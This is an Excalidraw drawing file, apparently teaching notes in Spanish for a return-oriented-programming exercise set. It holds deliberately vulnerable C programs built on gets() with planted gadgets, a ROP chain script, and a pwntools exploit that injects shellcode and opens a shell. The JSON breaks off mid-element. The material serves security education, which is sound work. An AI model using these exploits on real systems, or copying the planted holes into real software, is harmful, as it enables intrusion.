{
	"type": "excalidraw",
	"version": 2,
	"source": "https://github.com/zsviczian/obsidian-excalidraw-plugin/releases/tag/2.0.23",
	"elements": [
		{
			"type": "text",
			"version": 508,
			"versionNonce": 27416536,
			"isDeleted": false,
			"id": "b4H2N0nl",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1212.997736664819,
			"y": -1232.5507429178924,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 640.1033935546875,
			"height": 60.138591093791156,
			"seed": 1778848747,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 48.110872875032925,
			"fontFamily": 1,
			"text": "Ejercicios ROP: (conceptos)",
			"rawText": "Ejercicios ROP: (conceptos)",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Ejercicios ROP: (conceptos)",
			"lineHeight": 1.25,
			"baseline": 42
		},
		{
			"type": "text",
			"version": 4825,
			"versionNonce": 573682088,
			"isDeleted": false,
			"id": "3WlfY6QD",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1238.2785282970235,
			"y": -1149.5384022397452,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 980.6793212890625,
			"height": 375,
			"seed": 1534287499,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 1,
			"text": "La idea del ejercicio 3 es que el usuario entienda una forma de ataque mas compleja como\npuede ser el ROP o Return Oriented Programming, a diferencia de los ejercicios anteriores,\nesta forma de ataque sigue siendo usada a día de hoy. Y los programas pertenecientes a los\nniveles de este ejercicio solo tendrán vulnerabilidades y ninguna protección sera voluntariamente \ndesactivada.\n\n    - El sistema usado sera unLinux Ubuntu de 64bits.\n    - La protección ASLR estará activada, por lo que ataques de buffer overlow basicos no\n      servirán para superar los niveles.\n\nDos niveles para estos ejercicios:\n\n    - Lvl1: Buscar una instrucción assembly especifica y ejecutar un payload con pwntools.\n    - Lvl2: Identificar 3 instrucciones de ensamblador y formar un payload para manipular el valor\n           de 2 registros y ejecutar una función externa.",
			"rawText": "La idea del ejercicio 3 es que el usuario entienda una forma de ataque mas compleja como\npuede ser el ROP o Return Oriented Programming, a diferencia de los ejercicios anteriores,\nesta forma de ataque sigue siendo usada a día de hoy. Y los programas pertenecientes a los\nniveles de este ejercicio solo tendrán vulnerabilidades y ninguna protección sera voluntariamente \ndesactivada.\n\n    - El sistema usado sera unLinux Ubuntu de 64bits.\n    - La protección ASLR estará activada, por lo que ataques de buffer overlow basicos no\n      servirán para superar los niveles.\n\nDos niveles para estos ejercicios:\n\n    - Lvl1: Buscar una instrucción assembly especifica y ejecutar un payload con pwntools.\n    - Lvl2: Identificar 3 instrucciones de ensamblador y formar un payload para manipular el valor\n           de 2 registros y ejecutar una función externa.",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "La idea del ejercicio 3 es que el usuario entienda una forma de ataque mas compleja como\npuede ser el ROP o Return Oriented Programming, a diferencia de los ejercicios anteriores,\nesta forma de ataque sigue siendo usada a día de hoy. Y los programas pertenecientes a los\nniveles de este ejercicio solo tendrán vulnerabilidades y ninguna protección sera voluntariamente \ndesactivada.\n\n    - El sistema usado sera unLinux Ubuntu de 64bits.\n    - La protección ASLR estará activada, por lo que ataques de buffer overlow basicos no\n      servirán para superar los niveles.\n\nDos niveles para estos ejercicios:\n\n    - Lvl1: Buscar una instrucción assembly especifica y ejecutar un payload con pwntools.\n    - Lvl2: Identificar 3 instrucciones de ensamblador y formar un payload para manipular el valor\n           de 2 registros y ejecutar una función externa.",
			"lineHeight": 1.25,
			"baseline": 368
		},
		{
			"type": "text",
			"version": 1165,
			"versionNonce": 406428888,
			"isDeleted": false,
			"id": "HoXE2RaK",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1257.7616045937157,
			"y": 578.7655163831716,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 903.7850341796875,
			"height": 36.761935064214214,
			"seed": 2050839851,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 29.409548051371374,
			"fontFamily": 1,
			"text": "Nivel2: Ejemplo de ataque a un programa con ASLR activado.:",
			"rawText": "Nivel2: Ejemplo de ataque a un programa con ASLR activado.:",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Nivel2: Ejemplo de ataque a un programa con ASLR activado.:",
			"lineHeight": 1.25,
			"baseline": 26
		},
		{
			"type": "text",
			"version": 4036,
			"versionNonce": 1465728168,
			"isDeleted": false,
			"id": "P5rI31YO",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1251.772126557749,
			"y": 683.2649190798089,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 934.7193603515625,
			"height": 300,
			"seed": 634353611,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 1,
			"text": "Objetivo a atacar: Ejecutable de programa en C, el payload se creara en un script de python\ny activara un proceso de forma remota con el contenido.\n\nFuncionamiento del programa: El programa pedirá insertar un payload al usuario con \ngets (función vulnerable) así se podrá desbordar el buffer. A parte de eso habrá una función\nllamada gadget que contendrá una instrucción ensamblador jmp esp.\n\nComo superar el nivel: haciendo uso del script proporcionado se podrá romper el programa, ya \nque el código es mas complejo que los ejercicios anteriores, el usuario deberá entender el \ncálculo dinámico de la longitud de buffer, la detección del código útil que necesitamos y la \nestructuración  del payload.\n",
			"rawText": "Objetivo a atacar: Ejecutable de programa en C, el payload se creara en un script de python\ny activara un proceso de forma remota con el contenido.\n\nFuncionamiento del programa: El programa pedirá insertar un payload al usuario con \ngets (función vulnerable) así se podrá desbordar el buffer. A parte de eso habrá una función\nllamada gadget que contendrá una instrucción ensamblador jmp esp.\n\nComo superar el nivel: haciendo uso del script proporcionado se podrá romper el programa, ya \nque el código es mas complejo que los ejercicios anteriores, el usuario deberá entender el \ncálculo dinámico de la longitud de buffer, la detección del código útil que necesitamos y la \nestructuración  del payload.\n",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Objetivo a atacar: Ejecutable de programa en C, el payload se creara en un script de python\ny activara un proceso de forma remota con el contenido.\n\nFuncionamiento del programa: El programa pedirá insertar un payload al usuario con \ngets (función vulnerable) así se podrá desbordar el buffer. A parte de eso habrá una función\nllamada gadget que contendrá una instrucción ensamblador jmp esp.\n\nComo superar el nivel: haciendo uso del script proporcionado se podrá romper el programa, ya \nque el código es mas complejo que los ejercicios anteriores, el usuario deberá entender el \ncálculo dinámico de la longitud de buffer, la detección del código útil que necesitamos y la \nestructuración  del payload.\n",
			"lineHeight": 1.25,
			"baseline": 293
		},
		{
			"type": "text",
			"version": 1403,
			"versionNonce": 1168130520,
			"isDeleted": false,
			"id": "YaSr5vYl",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -563.3835549023495,
			"y": 1042.1155697493166,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 212.6953125,
			"height": 239.69378109659348,
			"seed": 879116555,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [
				{
					"id": "RKY_eHurGMkg0vt5j2EOf",
					"type": "arrow"
				}
			],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 18.158619780044962,
			"fontFamily": 3,
			"text": "#include <stdio.h>\n#include <stdlib.h>\n\nint gadget() {\n    asm(\"jmp %esp\");\n}\n\nint main() {\n    char buffer[32];\n    gets(buffer);\n}",
			"rawText": "#include <stdio.h>\n#include <stdlib.h>\n\nint gadget() {\n    asm(\"jmp %esp\");\n}\n\nint main() {\n    char buffer[32];\n    gets(buffer);\n}",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "#include <stdio.h>\n#include <stdlib.h>\n\nint gadget() {\n    asm(\"jmp %esp\");\n}\n\nint main() {\n    char buffer[32];\n    gets(buffer);\n}",
			"lineHeight": 1.2,
			"baseline": 235
		},
		{
			"type": "text",
			"version": 1503,
			"versionNonce": 350185384,
			"isDeleted": false,
			"id": "4gpSu72P",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1241.1489400368014,
			"y": -729.2834510248479,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 908.9005737304688,
			"height": 36.761935064214214,
			"seed": 149708267,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 29.409548051371374,
			"fontFamily": 1,
			"text": "Nivel1: Crear payload complejo para manipular varios registros ",
			"rawText": "Nivel1: Crear payload complejo para manipular varios registros ",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Nivel1: Crear payload complejo para manipular varios registros ",
			"lineHeight": 1.25,
			"baseline": 26
		},
		{
			"type": "text",
			"version": 4945,
			"versionNonce": 954877656,
			"isDeleted": false,
			"id": "zYARLkzm",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1242.0479599741093,
			"y": -670.7080688949845,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 998.5191650390625,
			"height": 350,
			"seed": 1126131851,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 1,
			"text": "Objetivo a atacar: Ejecutable de programa en C, al ejecutar al usuario\nse le pedirá un payload o contenido para llenar un buffer.\n\nFuncionamiento del programa: Parecido al nivel 3 de la versión de 32 bits, este programa\npedirá un payload al usuario, insertando el payload correcto se puede desbordar el buffer\ny ejecutar un función escape. Sin embargo escape tendrá 2 condiciones a modo de \"candados\". \nPara desbloquear estos candados se deberá introducir la constante correcta.\n\nComo superar el nivel: Al usuario se le dará un esqueleto de un script de pwntools, mediante\ngdb u otro script que calcule la longitud del buffer, este deberá calcular el tamaño del buffer \ne identificar las direcciones de memoria de 3 instrucciones situadas en las funciones gadget1, 2 y 3.\nEstas instrucciones sirven para\n\n",
			"rawText": "Objetivo a atacar: Ejecutable de programa en C, al ejecutar al usuario\nse le pedirá un payload o contenido para llenar un buffer.\n\nFuncionamiento del programa: Parecido al nivel 3 de la versión de 32 bits, este programa\npedirá un payload al usuario, insertando el payload correcto se puede desbordar el buffer\ny ejecutar un función escape. Sin embargo escape tendrá 2 condiciones a modo de \"candados\". \nPara desbloquear estos candados se deberá introducir la constante correcta.\n\nComo superar el nivel: Al usuario se le dará un esqueleto de un script de pwntools, mediante\ngdb u otro script que calcule la longitud del buffer, este deberá calcular el tamaño del buffer \ne identificar las direcciones de memoria de 3 instrucciones situadas en las funciones gadget1, 2 y 3.\nEstas instrucciones sirven para\n\n",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Objetivo a atacar: Ejecutable de programa en C, al ejecutar al usuario\nse le pedirá un payload o contenido para llenar un buffer.\n\nFuncionamiento del programa: Parecido al nivel 3 de la versión de 32 bits, este programa\npedirá un payload al usuario, insertando el payload correcto se puede desbordar el buffer\ny ejecutar un función escape. Sin embargo escape tendrá 2 condiciones a modo de \"candados\". \nPara desbloquear estos candados se deberá introducir la constante correcta.\n\nComo superar el nivel: Al usuario se le dará un esqueleto de un script de pwntools, mediante\ngdb u otro script que calcule la longitud del buffer, este deberá calcular el tamaño del buffer \ne identificar las direcciones de memoria de 3 instrucciones situadas en las funciones gadget1, 2 y 3.\nEstas instrucciones sirven para\n\n",
			"lineHeight": 1.25,
			"baseline": 343
		},
		{
			"type": "text",
			"version": 2453,
			"versionNonce": 1457795752,
			"isDeleted": false,
			"id": "C3LvreHL",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1232.3474806578374,
			"y": -330.38476887193355,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 490.0078125,
			"height": 683.679391394702,
			"seed": 1702953419,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [
				{
					"id": "O3DzwUfgh9q1vVKqQa53F",
					"type": "arrow"
				}
			],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 12.121975024728759,
			"fontFamily": 3,
			"text": "#include <stdio.h>\n#include <string.h>\n\nunsigned int lock1;\nunsigned int lock2;\n\nvoid gadjet1(){\n  asm(\"pop %rax;\"\n      \"ret\");\n}\n\nvoid gadjet2(){\n  asm(\"pop %rcx;\"\n      \"ret\");\n}\n\nvoid gadjet3(){\n  asm(\"mov %rax, (%rcx)\"\n      \"ret\");\n}\n\n\nvoid escape() {\n  if (lock1 == 1089169457267428344 && lock2 == 1073538260354985479) {\n    printf(\"NIVEL 2 SUPERADO!!!\\n\");\n   } else {\n    printf(\"Buen intento, pero lock1 y/o lock2 son incorrectos!\\n\");\n  }\n  \n}\n\nvoid overflow(){\n  char buff[32]; \n  printf(\"Inserta tu payload:\");\n  gets(buff);\n  printf(\"Buffer content: %s\\n\", buff);\n\n}\n\n\nint main() {\n  printf(\"Puede que con escape() haya una forma de salir...\\n \\n\");\n  overflow();\n  return 0;\n}\n\n",
			"rawText": "#include <stdio.h>\n#include <string.h>\n\nunsigned int lock1;\nunsigned int lock2;\n\nvoid gadjet1(){\n  asm(\"pop %rax;\"\n      \"ret\");\n}\n\nvoid gadjet2(){\n  asm(\"pop %rcx;\"\n      \"ret\");\n}\n\nvoid gadjet3(){\n  asm(\"mov %rax, (%rcx)\"\n      \"ret\");\n}\n\n\nvoid escape() {\n  if (lock1 == 1089169457267428344 && lock2 == 1073538260354985479) {\n    printf(\"NIVEL 2 SUPERADO!!!\\n\");\n   } else {\n    printf(\"Buen intento, pero lock1 y/o lock2 son incorrectos!\\n\");\n  }\n  \n}\n\nvoid overflow(){\n  char buff[32]; \n  printf(\"Inserta tu payload:\");\n  gets(buff);\n  printf(\"Buffer content: %s\\n\", buff);\n\n}\n\n\nint main() {\n  printf(\"Puede que con escape() haya una forma de salir...\\n \\n\");\n  overflow();\n  return 0;\n}\n\n",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "#include <stdio.h>\n#include <string.h>\n\nunsigned int lock1;\nunsigned int lock2;\n\nvoid gadjet1(){\n  asm(\"pop %rax;\"\n      \"ret\");\n}\n\nvoid gadjet2(){\n  asm(\"pop %rcx;\"\n      \"ret\");\n}\n\nvoid gadjet3(){\n  asm(\"mov %rax, (%rcx)\"\n      \"ret\");\n}\n\n\nvoid escape() {\n  if (lock1 == 1089169457267428344 && lock2 == 1073538260354985479) {\n    printf(\"NIVEL 2 SUPERADO!!!\\n\");\n   } else {\n    printf(\"Buen intento, pero lock1 y/o lock2 son incorrectos!\\n\");\n  }\n  \n}\n\nvoid overflow(){\n  char buff[32]; \n  printf(\"Inserta tu payload:\");\n  gets(buff);\n  printf(\"Buffer content: %s\\n\", buff);\n\n}\n\n\nint main() {\n  printf(\"Puede que con escape() haya una forma de salir...\\n \\n\");\n  overflow();\n  return 0;\n}\n\n",
			"lineHeight": 1.2,
			"baseline": 681
		},
		{
			"type": "text",
			"version": 1201,
			"versionNonce": 514567128,
			"isDeleted": false,
			"id": "WrsiXadY",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -676.10354925403,
			"y": -354.6615382041305,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 409.1953125,
			"height": 757.8560738979232,
			"seed": 1879440950,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [
				{
					"id": "ay9AKtd3is89V0NhySrNK",
					"type": "arrow"
				},
				{
					"id": "EhOCeCeq1TCRIa-btQNLm",
					"type": "arrow"
				},
				{
					"id": "O3DzwUfgh9q1vVKqQa53F",
					"type": "arrow"
				},
				{
					"id": "RePhAHWMj56yM0YacAlTx",
					"type": "arrow"
				},
				{
					"id": "wDj0WgYAt8-0Pa-tHQwb9",
					"type": "arrow"
				}
			],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 13.437164430814244,
			"fontFamily": 3,
			"text": "import sys\nfrom pwn import process, context, p64, ELF, gdb\nimport time\nimport re\n\ntarget = './stage4'\ncontext.binary = ELF(target, checksec=False)\n\nloadRax = 0x401a67\nchangeAddress = 0x401a6b\nloadRaxAddress = 0x401a6f\ncallEscape = 0x401a75\n\n\np = process(target)\nio = p\n\n# Recibir output del programa e imprimirlo en ASCII\noutput = io.recv()\nprint(output.decode('ascii'))\n\n############### GENERAR PAYLOAD ####################\n\ninput = b'a'*56\ninput += p64(loadRax) \ninput += p64(0xf1d81d9c8a14bf8)\ninput += p64(changeAddress)\ninput += p64(0x405068)\ninput += p64(loadRaxAddress)\n\ninput += p64(loadRax)\ninput += p64(0xee5f95c253fee07)\ninput += p64(changeAddress)\ninput += p64(0x405060)\ninput += p64(loadRaxAddress)\ninput += p64(callEscape)\n\n####################################################\n\n# Enviar payload\nio.sendline(input)\n\n# Obtener output\noutput = io.recv()\n\nprint(output.decode('ascii'))\n",
			"rawText": "import sys\nfrom pwn import process, context, p64, ELF, gdb\nimport time\nimport re\n\ntarget = './stage4'\ncontext.binary = ELF(target, checksec=False)\n\nloadRax = 0x401a67\nchangeAddress = 0x401a6b\nloadRaxAddress = 0x401a6f\ncallEscape = 0x401a75\n\n\np = process(target)\nio = p\n\n# Recibir output del programa e imprimirlo en ASCII\noutput = io.recv()\nprint(output.decode('ascii'))\n\n############### GENERAR PAYLOAD ####################\n\ninput = b'a'*56\ninput += p64(loadRax) \ninput += p64(0xf1d81d9c8a14bf8)\ninput += p64(changeAddress)\ninput += p64(0x405068)\ninput += p64(loadRaxAddress)\n\ninput += p64(loadRax)\ninput += p64(0xee5f95c253fee07)\ninput += p64(changeAddress)\ninput += p64(0x405060)\ninput += p64(loadRaxAddress)\ninput += p64(callEscape)\n\n####################################################\n\n# Enviar payload\nio.sendline(input)\n\n# Obtener output\noutput = io.recv()\n\nprint(output.decode('ascii'))\n",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "import sys\nfrom pwn import process, context, p64, ELF, gdb\nimport time\nimport re\n\ntarget = './stage4'\ncontext.binary = ELF(target, checksec=False)\n\nloadRax = 0x401a67\nchangeAddress = 0x401a6b\nloadRaxAddress = 0x401a6f\ncallEscape = 0x401a75\n\n\np = process(target)\nio = p\n\n# Recibir output del programa e imprimirlo en ASCII\noutput = io.recv()\nprint(output.decode('ascii'))\n\n############### GENERAR PAYLOAD ####################\n\ninput = b'a'*56\ninput += p64(loadRax) \ninput += p64(0xf1d81d9c8a14bf8)\ninput += p64(changeAddress)\ninput += p64(0x405068)\ninput += p64(loadRaxAddress)\n\ninput += p64(loadRax)\ninput += p64(0xee5f95c253fee07)\ninput += p64(changeAddress)\ninput += p64(0x405060)\ninput += p64(loadRaxAddress)\ninput += p64(callEscape)\n\n####################################################\n\n# Enviar payload\nio.sendline(input)\n\n# Obtener output\noutput = io.recv()\n\nprint(output.decode('ascii'))\n",
			"lineHeight": 1.2,
			"baseline": 755
		},
		{
			"type": "rectangle",
			"version": 3593,
			"versionNonce": 1646751144,
			"isDeleted": false,
			"id": "j_7-PWjjJa7yD6ITMtkY6",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1252.262897178606,
			"y": 459.9807060263611,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 1055.6585251319193,
			"height": 42.62953811713237,
			"seed": 394430198,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 3
			},
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false
		},
		{
			"type": "text",
			"version": 2187,
			"versionNonce": 1217241304,
			"isDeleted": false,
			"id": "QWkx0rra",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": -1249.3405792625729,
			"y": 428.99355865351583,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 53.408203125,
			"height": 21.87617833796892,
			"seed": 1187133494,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 18.2301486149741,
			"fontFamily": 3,
			"text": "buff1",
			"rawText": "buff1",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "buff1",
			"lineHeight": 1.2,
			"baseline": 18
		},
		{
			"type": "line",
			"version": 1116,
			"versionNonce": 154892456,
			"isDeleted": false,
			"id": "5TltKpthTy0aKGxNWMfIZ",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1009.0607319718063,
			"y": 460.2903151198916,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 46.17428763085621,
			"seed": 1836695926,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					46.17428763085621
				]
			]
		},
		{
			"type": "line",
			"version": 1067,
			"versionNonce": 1423164888,
			"isDeleted": false,
			"id": "QCKEZ6BRFBTm9EXHHaJ0E",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1078.0780149041161,
			"y": 460.7835306939058,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 41.12399513272208,
			"seed": 2129535670,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					41.12399513272208
				]
			]
		},
		{
			"type": "text",
			"version": 1099,
			"versionNonce": 1737892776,
			"isDeleted": false,
			"id": "IJWegaJ2",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1073.027722405982,
			"y": 426.4029023911519,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 34.470703125,
			"height": 23.539027104049254,
			"seed": 1036278774,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 19.615855920041046,
			"fontFamily": 3,
			"text": "rbp",
			"rawText": "rbp",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "rbp",
			"lineHeight": 1.2,
			"baseline": 18
		},
		{
			"type": "text",
			"version": 1167,
			"versionNonce": 520964824,
			"isDeleted": false,
			"id": "Jn1tNm8I",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1005.8616142485205,
			"y": 427.18635215346586,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 34.470703125,
			"height": 23.539027104049254,
			"seed": 1342270774,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 19.615855920041046,
			"fontFamily": 3,
			"text": "rip",
			"rawText": "rip",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "rip",
			"lineHeight": 1.2,
			"baseline": 18
		},
		{
			"type": "text",
			"version": 1070,
			"versionNonce": 459501224,
			"isDeleted": false,
			"id": "eEr5xVJ3",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1251.3921625124876,
			"y": 470.5370970880419,
			"strokeColor": "#e03131",
			"backgroundColor": "transparent",
			"width": 229.921875,
			"height": 23.544569236270345,
			"seed": 631115178,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"fontSize": 19.62047436355862,
			"fontFamily": 3,
			"text": "AAAAAAAAAAAAAAAAAAAA",
			"rawText": "AAAAAAAAAAAAAAAAAAAA",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "AAAAAAAAAAAAAAAAAAAA",
			"lineHeight": 1.2,
			"baseline": 18
		},
		{
			"type": "text",
			"version": 2107,
			"versionNonce": 1382744024,
			"isDeleted": false,
			"id": "SaKpcOs8",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1243.83206155997,
			"y": 1027.4382433339194,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 605.15625,
			"height": 712.9163080621308,
			"seed": 395344330,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [
				{
					"id": "RKY_eHurGMkg0vt5j2EOf",
					"type": "arrow"
				}
			],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 12.915150508371935,
			"fontFamily": 3,
			"text": "from pwn import *\n\n# Crear instancia del proceso del proograma a atacar\nio = gdb.debug('./level1')\n\n#Asignar un debuger y pausarlo\npause()\n\n# Cargar una copia del binario para buscar JMP ESP\nbinary = ELF('./level1')\n\n# Ensamblar la secuancia de jmp esp para buscarlo en el binario.\njmp_esp = asm('jmp esp')\njmp_esp = next(binary.search(jmp_esp))\n\nlog.info(\"Found jmp esp at %#x\" % jmp_esp)\n\n# Desbordar buffer con patrón cíclico para poder buscar la distancia del buffer.\n#\n#  EBP  0x6161616b ('kaaa')\n# *ESP  0xff84be30 <-- 'maaanaaaoaaapaaaqaaar...'\n# *EIP  0x6161616c ('laaa')\ncrash = False\n\nif crash:\n    pattern = cyclic(512)\n    io.sendline(pattern)\n    pause()\n    sys.exit()\n\n# Llenar la distancia del buffer con el patrón cíclico suficiente hasta EIP\nexploit = cyclic(cyclic_find(0x6161616c))\n\n# LLenar el hueco de EIP con 'jmp esp'\nexploit += pack(jmp_esp)\n\n# Añadir el shellcode\nexploit += asm(shellcraft.sh())\n\n# enviar el payload\nio.sendline(exploit)\n\n# Cargar la shell\nio.interactive()\n\n",
			"rawText": "from pwn import *\n\n# Crear instancia del proceso del proograma a atacar\nio = gdb.debug('./level1')\n\n#Asignar un debuger y pausarlo\npause()\n\n# Cargar una copia del binario para buscar JMP ESP\nbinary = ELF('./level1')\n\n# Ensamblar la secuancia de jmp esp para buscarlo en el binario.\njmp_esp = asm('jmp esp')\njmp_esp = next(binary.search(jmp_esp))\n\nlog.info(\"Found jmp esp at %#x\" % jmp_esp)\n\n# Desbordar buffer con patrón cíclico para poder buscar la distancia del buffer.\n#\n#  EBP  0x6161616b ('kaaa')\n# *ESP  0xff84be30 <-- 'maaanaaaoaaapaaaqaaar...'\n# *EIP  0x6161616c ('laaa')\ncrash = False\n\nif crash:\n    pattern = cyclic(512)\n    io.sendline(pattern)\n    pause()\n    sys.exit()\n\n# Llenar la distancia del buffer con el patrón cíclico suficiente hasta EIP\nexploit = cyclic(cyclic_find(0x6161616c))\n\n# LLenar el hueco de EIP con 'jmp esp'\nexploit += pack(jmp_esp)\n\n# Añadir el shellcode\nexploit += asm(shellcraft.sh())\n\n# enviar el payload\nio.sendline(exploit)\n\n# Cargar la shell\nio.interactive()\n\n",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
